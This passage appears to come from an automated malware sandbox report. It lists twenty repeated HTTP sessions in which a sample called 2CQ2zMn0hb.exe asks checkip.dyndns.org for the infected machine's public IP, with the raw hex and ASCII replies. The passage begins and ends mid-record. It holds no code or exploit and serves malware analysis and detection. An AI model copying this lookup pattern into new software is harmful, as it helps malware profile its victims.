                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.549999132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:51.755938053 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:52.437669039 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:52 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.550001132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:53.531601906 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:54.203829050 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:54 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.550003132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:55.230660915 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:55.926980019 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:55 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.550005132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:56.910090923 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:57.584853888 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:57 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.550007132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:53:58.675137997 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:53:59.365570068 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:53:59 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.550009132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:00.425035000 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:01.100239038 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:01 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.550011132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:02.019860029 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:02.693260908 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:02 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.550013132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:03.772794008 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:04.467611074 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:04 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.550015132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:05.397986889 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:06.070350885 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:05 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.550017132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:06.959592104 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:07.653879881 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:07 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.550019132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:08.672385931 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:09.363729954 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:09 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.550021132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:10.320934057 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:11.011043072 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:10 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.550023132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:12.158607006 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:12.840878963 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:12 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.550025132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:13.890842915 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:14.568340063 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:14 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.550027132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:15.749733925 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:16.448885918 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:16 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.550029132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:17.407418013 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:18.107491970 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:18 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.550031132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:19.019947052 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:19.711462975 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:19 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.550033132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:20.674637079 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:21.383222103 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:21 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.550035132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:22.346035957 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:23.018646002 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:22 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.550037132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:23.950419903 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:24.646056890 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:24 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
